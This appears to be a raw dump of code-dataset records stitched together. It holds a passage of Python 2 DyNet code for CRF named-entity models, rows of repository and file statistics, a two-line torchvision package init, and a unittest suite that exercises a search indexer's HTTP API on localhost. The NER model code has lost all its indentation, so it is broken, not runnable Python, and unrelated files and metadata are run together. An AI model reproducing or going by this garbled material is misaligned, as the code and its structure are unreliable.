self.crf_decoder = chain_CRF_decoder(args, self.model, src_ctx_dim, tag_emb_dim, ner_tag_size, constraints=self.constraints)
def forward(self, sents, char_sents, feats, bc_feats, training=True):
char_embs = self.char_birnn_encoder.encode(char_sents, training=training, char=True)
word_embs = self.word_lookup.encode(sents)
if self.args.use_discrete_features:
feat_embs = self.feature_encoder.encode(feats)
if self.args.use_brown_cluster:
bc_feat_embs = self.bc_encoder.encode(bc_feats)
if self.args.use_discrete_features and self.args.use_brown_cluster:
concat_inputs = [dy.concatenate([c, w, f, b]) for c, w, f, b in
zip(char_embs, word_embs, feat_embs, bc_feat_embs)]
elif self.args.use_brown_cluster and not self.args.use_discrete_features:
concat_inputs = [dy.concatenate([c, w, f]) for c, w, f in
zip(char_embs, word_embs, bc_feat_embs)]
elif self.args.use_discrete_features and not self.args.use_brown_cluster:
concat_inputs = [dy.concatenate([c, w, f]) for c, w, f in
zip(char_embs, word_embs, feat_embs)]
else:
concat_inputs = [dy.concatenate([c, w]) for c, w in zip(char_embs, word_embs)]
birnn_outputs = self.birnn_encoder.encode(concat_inputs, training=training)
return birnn_outputs
class CNN_BiRNN_CRF_model(CRF_Model):
''' Concatenate both the cnn char representation and birnn char representation as the char vector. '''
def __init__(self, args, data_loader):
self.model = dy.Model()
self.args = args
super(CNN_BiRNN_CRF_model, self).__init__(args, data_loader)
ner_tag_size = data_loader.ner_vocab_size
char_vocab_size = data_loader.char_vocab_size
word_vocab_size = data_loader.word_vocab_size
word_padding_token = data_loader.word_padding_token
char_emb_dim = args.char_emb_dim
word_emb_dim = args.word_emb_dim
tag_emb_dim = args.tag_emb_dim
if args.map_pretrain:
birnn_input_dim = args.char_hidden_dim * 2 + args.map_dim + args.cnn_filter_size
else:
birnn_input_dim = args.char_hidden_dim * 2 + args.word_emb_dim + args.cnn_filter_size
hidden_dim = args.hidden_dim
char_hidden_dim = args.char_hidden_dim
src_ctx_dim = args.hidden_dim * 2
cnn_filter_size = args.cnn_filter_size
cnn_win_size = args.cnn_win_size
output_dropout_rate = args.output_dropout_rate
emb_dropout_rate = args.emb_dropout_rate
if args.use_discrete_features:
self.num_feats = data_loader.num_feats
self.feature_encoder = Discrete_Feature_Encoder(self.model, self.num_feats, args.feature_dim)
birnn_input_dim += args.feature_dim * self.num_feats
if args.use_brown_cluster:
bc_num = args.brown_cluster_num
bc_dim = args.brown_cluster_dim
# for each batch, the length of input seqs are the same, so we don't have bother with padding
self.bc_encoder = Lookup_Encoder(self.model, args, bc_num, bc_dim, word_padding_token, isFeatureEmb=True)
birnn_input_dim += bc_dim
self.char_cnn_encoder = CNN_Encoder(self.model, char_emb_dim, cnn_win_size, cnn_filter_size,
0.0, char_vocab_size, data_loader.char_padding_token)
self.char_birnn_encoder = BiRNN_Encoder(self.model,
char_emb_dim,
char_hidden_dim,
emb_dropout_rate=0.0,
output_dropout_rate=0.0,
vocab_size=0,
emb_size=char_emb_dim,
vocab_emb=self.char_cnn_encoder.lookup_emb)
if args.pretrain_emb_path is None:
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token)
else:
print "In NER CRF: Using pretrained word embedding!"
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token, data_loader.pretrain_word_emb)
self.birnn_encoder = BiRNN_Encoder(self.model,
birnn_input_dim,
hidden_dim,
emb_dropout_rate=emb_dropout_rate,
output_dropout_rate=output_dropout_rate,
vocab_size=0)
# self.crf_decoder = classifier(self.model, src_ctx_dim, ner_tag_size)
self.crf_decoder = chain_CRF_decoder(args, self.model, src_ctx_dim, tag_emb_dim, ner_tag_size, constraints=self.constraints)
def forward(self, sents, char_sents, feats, bc_feats, training=True):
char_embs_birnn = self.char_birnn_encoder.encode(char_sents, training=training, char=True)
char_embs_cnn = self.char_cnn_encoder.encode(char_sents, training=training, char=True)
word_embs = self.word_lookup.encode(sents)
if self.args.use_discrete_features:
feat_embs = self.feature_encoder.encode(feats)
if self.args.use_brown_cluster:
bc_feat_embs = self.bc_encoder.encode(bc_feats)
if self.args.use_discrete_features and self.args.use_brown_cluster:
concat_inputs = [dy.concatenate([cr, cc, w, f, b]) for cr, cc, w, f, b in
zip(char_embs_birnn, char_embs_cnn, word_embs, feat_embs, bc_feat_embs)]
elif self.args.use_brown_cluster and not self.args.use_discrete_features:
concat_inputs = [dy.concatenate([cr, cc, w, f]) for cr, cc, w, f in
zip(char_embs_birnn, char_embs_cnn, word_embs, bc_feat_embs)]
elif self.args.use_discrete_features and not self.args.use_brown_cluster:
concat_inputs = [dy.concatenate([cr, cc, w, f]) for cr, cc, w, f in
zip(char_embs_birnn, char_embs_cnn, word_embs, feat_embs)]
else:
concat_inputs = [dy.concatenate([cr, cc, w]) for cr, cc, w in zip(char_embs_birnn, char_embs_cnn, word_embs)]
birnn_outputs = self.birnn_encoder.encode(concat_inputs, training=training)
return birnn_outputs
class Sep_Encoder_CRF_model(CRF_Model):
''' Difference with CNN_BiRnn_CRF_Model: use two BiLSTM to model the embedding features (char and word) and linguistic features respectively. '''
def __init__(self, args, data_loader):
self.model = dy.Model()
self.args = args
super(Sep_Encoder_CRF_model, self).__init__(args, data_loader)
ner_tag_size = data_loader.ner_vocab_size
char_vocab_size = data_loader.char_vocab_size
word_vocab_size = data_loader.word_vocab_size
word_padding_token = data_loader.word_padding_token
char_emb_dim = args.char_emb_dim
word_emb_dim = args.word_emb_dim
tag_emb_dim = args.tag_emb_dim
if args.map_pretrain:
birnn_input_dim = args.char_hidden_dim * 2 + args.map_dim + args.cnn_filter_size
else:
birnn_input_dim = args.char_hidden_dim * 2 + args.word_emb_dim + args.cnn_filter_size
hidden_dim = args.hidden_dim
char_hidden_dim = args.char_hidden_dim
src_ctx_dim = args.hidden_dim * 2
cnn_filter_size = args.cnn_filter_size
cnn_win_size = args.cnn_win_size
output_dropout_rate = args.output_dropout_rate
emb_dropout_rate = args.emb_dropout_rate
self.feature_birnn_input_dim = 0
if args.use_discrete_features:
self.num_feats = data_loader.num_feats
self.feature_encoder = Discrete_Feature_Encoder(self.model, self.num_feats, args.feature_dim)
self.feature_birnn_input_dim += args.feature_dim * self.num_feats
if args.use_brown_cluster:
bc_num = args.brown_cluster_num
bc_dim = args.brown_cluster_dim
# for each batch, the length of input seqs are the same, so we don't have bother with padding
self.bc_encoder = Lookup_Encoder(self.model, args, bc_num, bc_dim, word_padding_token, isFeatureEmb=True)
self.feature_birnn_input_dim += bc_dim
if self.feature_birnn_input_dim > 0:
self.feature_birnn = BiRNN_Encoder(self.model,
self.feature_birnn_input_dim,
args.feature_birnn_hidden_dim,
emb_dropout_rate=0.0,
output_dropout_rate=output_dropout_rate,
vocab_size=0)
src_ctx_dim += args.feature_birnn_hidden_dim * 2
self.char_cnn_encoder = CNN_Encoder(self.model, char_emb_dim, cnn_win_size, cnn_filter_size,
0.0, char_vocab_size, data_loader.char_padding_token)
self.char_birnn_encoder = BiRNN_Encoder(self.model,
char_emb_dim,
char_hidden_dim,
emb_dropout_rate=0.0,
output_dropout_rate=0.0,
vocab_size=0,
emb_size=char_emb_dim,
vocab_emb=self.char_cnn_encoder.lookup_emb)
if args.pretrain_emb_path is None:
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token)
else:
print "In NER CRF: Using pretrained word embedding!"
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token, data_loader.pretrain_word_emb)
self.birnn_encoder = BiRNN_Encoder(self.model,
birnn_input_dim,
hidden_dim,
emb_dropout_rate=emb_dropout_rate,
output_dropout_rate=output_dropout_rate,
vocab_size=0)
# self.crf_decoder = classifier(self.model, src_ctx_dim, ner_tag_size)
self.crf_decoder = chain_CRF_decoder(args, self.model, src_ctx_dim, tag_emb_dim, ner_tag_size, constraints=self.constraints)
def forward(self, sents, char_sents, feats, bc_feats, training=True):
char_embs_birnn = self.char_birnn_encoder.encode(char_sents, training=training, char=True)
char_embs_cnn = self.char_cnn_encoder.encode(char_sents, training=training, char=True)
word_embs = self.word_lookup.encode(sents)
concat_inputs = [dy.concatenate([cr, cc, w]) for cr, cc, w in zip(char_embs_birnn, char_embs_cnn, word_embs)]
birnn_outputs = self.birnn_encoder.encode(concat_inputs, training=training)
if self.feature_birnn_input_dim > 0:
if self.args.use_discrete_features:
feat_embs = self.feature_encoder.encode(feats)
concat_inputs = feat_embs
if self.args.use_brown_cluster:
cluster_embs = self.bc_encoder.encode(bc_feats)
concat_inputs = cluster_embs
if self.args.use_discrete_features and self.args.use_brown_cluster:
concat_inputs = [dy.concatenate([fe, ce]) for fe, ce in
zip(feat_embs, cluster_embs)]
fts_birnn_outputs = self.feature_birnn.encode(concat_inputs, training=training)
birnn_outputs = [dy.concatenate([eb, fb]) for eb, fb in zip(birnn_outputs, fts_birnn_outputs)]
return birnn_outputs
class Sep_CNN_Encoder_CRF_model(CRF_Model):
''' Difference with CNN_BiRnn_CRF_Model: use two BiLSTM to model the embedding features (char and word) and linguistic features respectively. '''
def __init__(self, args, data_loader):
self.model = dy.Model()
self.args = args
super(Sep_CNN_Encoder_CRF_model, self).__init__(args, data_loader)
ner_tag_size = data_loader.ner_vocab_size
char_vocab_size = data_loader.char_vocab_size
word_vocab_size = data_loader.word_vocab_size
word_padding_token = data_loader.word_padding_token
char_emb_dim = args.char_emb_dim
word_emb_dim = args.word_emb_dim
tag_emb_dim = args.tag_emb_dim
if args.map_pretrain:
birnn_input_dim = args.map_dim + args.cnn_filter_size
else:
birnn_input_dim = args.word_emb_dim + args.cnn_filter_size
hidden_dim = args.hidden_dim
src_ctx_dim = args.hidden_dim * 2
cnn_filter_size = args.cnn_filter_size
cnn_win_size = args.cnn_win_size
output_dropout_rate = args.output_dropout_rate
emb_dropout_rate = args.emb_dropout_rate
self.feature_birnn_input_dim = 0
if args.use_discrete_features:
self.num_feats = data_loader.num_feats
self.feature_encoder = Discrete_Feature_Encoder(self.model, self.num_feats, args.feature_dim)
self.feature_birnn_input_dim += args.feature_dim * self.num_feats
if args.use_brown_cluster:
bc_num = args.brown_cluster_num
bc_dim = args.brown_cluster_dim
# for each batch, the length of input seqs are the same, so we don't have bother with padding
self.bc_encoder = Lookup_Encoder(self.model, args, bc_num, bc_dim, word_padding_token, isFeatureEmb=True)
self.feature_birnn_input_dim += bc_dim
if self.feature_birnn_input_dim > 0:
self.feature_birnn = BiRNN_Encoder(self.model,
self.feature_birnn_input_dim,
args.feature_birnn_hidden_dim,
emb_dropout_rate=0.0,
output_dropout_rate=output_dropout_rate,
vocab_size=0)
src_ctx_dim += args.feature_birnn_hidden_dim * 2
self.char_cnn_encoder = CNN_Encoder(self.model, char_emb_dim, cnn_win_size, cnn_filter_size,
0.0, char_vocab_size, data_loader.char_padding_token)
if args.pretrain_emb_path is None:
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token)
else:
print "In NER CRF: Using pretrained word embedding!"
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token, data_loader.pretrain_word_emb)
self.birnn_encoder = BiRNN_Encoder(self.model,
birnn_input_dim,
hidden_dim,
emb_dropout_rate=emb_dropout_rate,
output_dropout_rate=output_dropout_rate,
vocab_size=0)
# self.crf_decoder = classifier(self.model, src_ctx_dim, ner_tag_size)
self.crf_decoder = chain_CRF_decoder(args, self.model, src_ctx_dim, tag_emb_dim, ner_tag_size, constraints=self.constraints)
def forward(self, sents, char_sents, feats, bc_feats, training=True):
char_embs_cnn = self.char_cnn_encoder.encode(char_sents, training=training, char=True)
word_embs = self.word_lookup.encode(sents)
concat_inputs = [dy.concatenate([cc, w]) for cc, w in zip(char_embs_cnn, word_embs)]
birnn_outputs = self.birnn_encoder.encode(concat_inputs, training=training)
if self.feature_birnn_input_dim > 0:
if self.args.use_discrete_features:
feat_embs = self.feature_encoder.encode(feats)
concat_inputs = feat_embs
if self.args.use_brown_cluster:
cluster_embs = self.bc_encoder.encode(bc_feats)
concat_inputs = cluster_embs
if self.args.use_discrete_features and self.args.use_brown_cluster:
concat_inputs = [dy.concatenate([fe, ce]) for fe, ce in
zip(feat_embs, cluster_embs)]
fts_birnn_outputs = self.feature_birnn.encode(concat_inputs, training=training)
birnn_outputs = [dy.concatenate([eb, fb]) for eb, fb in zip(birnn_outputs, fts_birnn_outputs)]
return birnn_outputs
| 51.481061
| 149
| 0.627805
| 3,668
| 27,182
| 4.262541
| 0.049618
| 0.023025
| 0.017461
| 0.016374
| 0.927151
| 0.91826
| 0.913911
| 0.910841
| 0.906748
| 0.902143
| 0
| 0.003067
| 0.292289
| 27,182
| 527
| 150
| 51.578748
| 0.80969
| 0.042197
| 0
| 0.837438
| 0
| 0
| 0.01965
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.004926
| null | null | 0.022167
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e98c1559713dae12d1344974fda8cbe9584339b1
| 41
|
py
|
Python
|
torchvision/edgeailite/__init__.py
|
TexasInstruments/vision
|
abaf29de0798e8e8d3f996dc272cd3c515562695
|
[
"BSD-3-Clause"
] | 21
|
2021-10-08T02:47:56.000Z
|
2022-03-29T14:17:04.000Z
|
torchvision/edgeailite/__init__.py
|
TexasInstruments/vision
|
abaf29de0798e8e8d3f996dc272cd3c515562695
|
[
"BSD-3-Clause"
] | 9
|
2021-11-15T06:43:54.000Z
|
2022-03-16T04:47:52.000Z
|
torchvision/edgeailite/__init__.py
|
TexasInstruments/vision
|
abaf29de0798e8e8d3f996dc272cd3c515562695
|
[
"BSD-3-Clause"
] | 9
|
2021-11-11T11:17:16.000Z
|
2022-03-08T04:26:10.000Z
|
from . import xnn
from . import xvision
| 10.25
| 21
| 0.731707
| 6
| 41
| 5
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.219512
| 41
| 3
| 22
| 13.666667
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e9a6552f2365018bc814d63c24df199d427040e5
| 26,561
|
py
|
Python
|
tests/test_indexer_http.py
|
mosuka/basilisk
|
abe2de265af234bd78053ccc974ca4218a25cad3
|
[
"Apache-2.0"
] | 17
|
2018-10-19T02:36:41.000Z
|
2022-01-29T01:02:50.000Z
|
tests/test_indexer_http.py
|
mosuka/basilisk
|
abe2de265af234bd78053ccc974ca4218a25cad3
|
[
"Apache-2.0"
] | 23
|
2018-10-28T16:54:00.000Z
|
2019-02-15T17:09:25.000Z
|
tests/test_indexer_http.py
|
mosuka/basilisk
|
abe2de265af234bd78053ccc974ca4218a25cad3
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2019 Minoru Osuka
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import unittest
import zipfile
from http import HTTPStatus
from logging import ERROR, Formatter, getLogger, INFO, NOTSET, StreamHandler
from tempfile import TemporaryDirectory
from time import sleep
import requests
import yaml
from prometheus_client.core import CollectorRegistry
from pysyncobj import SyncObjConf
from cockatrice import NAME
from cockatrice.indexer import Indexer
from tests import get_free_port
class TestIndexHTTPServicer(unittest.TestCase):
def setUp(self):
self.temp_dir = TemporaryDirectory()
self.example_dir = os.path.normpath(os.path.join(os.path.dirname(__file__), '../example'))
host = '0.0.0.0'
port = get_free_port()
seed_addr = None
conf = SyncObjConf(
fullDumpFile=self.temp_dir.name + '/index.zip',
logCompactionMinTime=300,
dynamicMembershipChange=True
)
data_dir = self.temp_dir.name + '/index'
grpc_port = get_free_port()
grpc_max_workers = 10
http_port = get_free_port()
logger = getLogger(NAME)
log_handler = StreamHandler()
logger.setLevel(ERROR)
log_handler.setLevel(INFO)
log_format = Formatter('%(asctime)s - %(levelname)s - %(pathname)s:%(lineno)d - %(message)s')
log_handler.setFormatter(log_format)
logger.addHandler(log_handler)
http_logger = getLogger(NAME + '_http')
http_log_handler = StreamHandler()
http_logger.setLevel(NOTSET)
http_log_handler.setLevel(INFO)
http_log_format = Formatter('%(message)s')
http_log_handler.setFormatter(http_log_format)
http_logger.addHandler(http_log_handler)
metrics_registry = CollectorRegistry()
self.indexer = Indexer(host=host, port=port, seed_addr=seed_addr, conf=conf, data_dir=data_dir,
grpc_port=grpc_port, grpc_max_workers=grpc_max_workers, http_port=http_port,
logger=logger, http_logger=http_logger, metrics_registry=metrics_registry)
self.host = host
self.port = http_port
def tearDown(self):
self.indexer.stop()
self.temp_dir.cleanup()
def test_root(self):
# get
response = requests.get('http://{0}:{1}/'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
def test_put_index(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
def test_get_index(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# get index
response = requests.get('http://{0}:{1}/indices/test_index'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
def test_delete_index(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# get index
response = requests.get('http://{0}:{1}/indices/test_index'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# delete index
response = requests.delete('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# get index
response = requests.get('http://{0}:{1}/indices/test_index'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
def test_put_document_yaml(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# read document 1
with open(self.example_dir + '/doc1.yaml', 'r', encoding='utf-8') as file_obj:
doc = file_obj.read()
# put document 1
response = requests.put('http://{0}:{1}/indices/test_index/documents/1?sync=True'.format(self.host, self.port),
data=doc.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
def test_put_document_json(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# read document 1
with open(self.example_dir + '/doc1.json', 'r', encoding='utf-8') as file_obj:
doc = file_obj.read()
# put document 1
response = requests.put('http://{0}:{1}/indices/test_index/documents/1?sync=True'.format(self.host, self.port),
data=doc.encode('utf-8'), headers={'Content-Type': 'application/json'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
def test_get_document_yaml(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# read document 1
with open(self.example_dir + '/doc1.yaml', 'r', encoding='utf-8') as file_obj:
doc = file_obj.read()
# put document 1
response = requests.put('http://{0}:{1}/indices/test_index/documents/1?sync=True'.format(self.host, self.port),
data=doc.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# commit
response = requests.get('http://{0}:{1}/indices/test_index/commit?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# get document 1
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/1?output=yaml'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = yaml.safe_load(response.text)
self.assertEqual('1', data['fields']['id'])
def test_get_document_json(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# read document 1
with open(self.example_dir + '/doc1.yaml', 'r', encoding='utf-8') as file_obj:
doc = file_obj.read()
# put document 1
response = requests.put('http://{0}:{1}/indices/test_index/documents/1?sync=True'.format(self.host, self.port),
data=doc.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# commit
response = requests.get('http://{0}:{1}/indices/test_index/commit?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# get document 1
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/1?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('1', data['fields']['id'])
def test_delete_document(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# read document 1
with open(self.example_dir + '/doc1.yaml', 'r', encoding='utf-8') as file_obj:
doc = file_obj.read()
# put document 1
response = requests.put('http://{0}:{1}/indices/test_index/documents/1?sync=True'.format(self.host, self.port),
data=doc.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# commit
response = requests.get('http://{0}:{1}/indices/test_index/commit?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# get document 1
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/1?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('1', data['fields']['id'])
# delete document 1
response = requests.delete(
'http://{0}:{1}/indices/test_index/documents/1?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# commit
response = requests.get('http://{0}:{1}/indices/test_index/commit?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# get document 1
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/1?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
def test_put_documents_json(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# read documents
with open(self.example_dir + '/bulk_put.json', 'r', encoding='utf-8') as file_obj:
docs_json = file_obj.read()
# put documents
response = requests.put('http://{0}:{1}/indices/test_index/documents?sync=True'.format(self.host, self.port),
data=docs_json.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# commit
response = requests.get('http://{0}:{1}/indices/test_index/commit?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# get document 1
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/1?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('1', data['fields']['id'])
# get document 2
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/2?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('2', data['fields']['id'])
# get document 3
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/3?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('3', data['fields']['id'])
# get document 4
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/4?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('4', data['fields']['id'])
# get document 5
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/5?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('5', data['fields']['id'])
def test_delete_documents_json(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# read documents
with open(self.example_dir + '/bulk_put.json', 'r', encoding='utf-8') as file_obj:
docs_json = file_obj.read()
# put documents
response = requests.put('http://{0}:{1}/indices/test_index/documents?sync=True'.format(self.host, self.port),
data=docs_json.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# commit
response = requests.get('http://{0}:{1}/indices/test_index/commit?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# get document 1
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/1?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('1', data['fields']['id'])
# get document 2
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/2?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('2', data['fields']['id'])
# get document 3
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/3?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('3', data['fields']['id'])
# get document 4
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/4?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('4', data['fields']['id'])
# get document 5
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/5?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('5', data['fields']['id'])
# read documents
with open(self.example_dir + '/bulk_delete.json', 'r', encoding='utf-8') as file_obj:
doc_ids_json = file_obj.read()
# delete documents
response = requests.delete('http://{0}:{1}/indices/test_index/documents?sync=True'.format(self.host, self.port),
data=doc_ids_json.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.OK, response.status_code)
# commit
response = requests.get('http://{0}:{1}/indices/test_index/commit?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# get document 1
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/1?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
# get document 2
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/2?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
# get document 3
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/3?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
# get document 4
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/4?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
# get document 5
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/5?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
def test_search_documents_json(self):
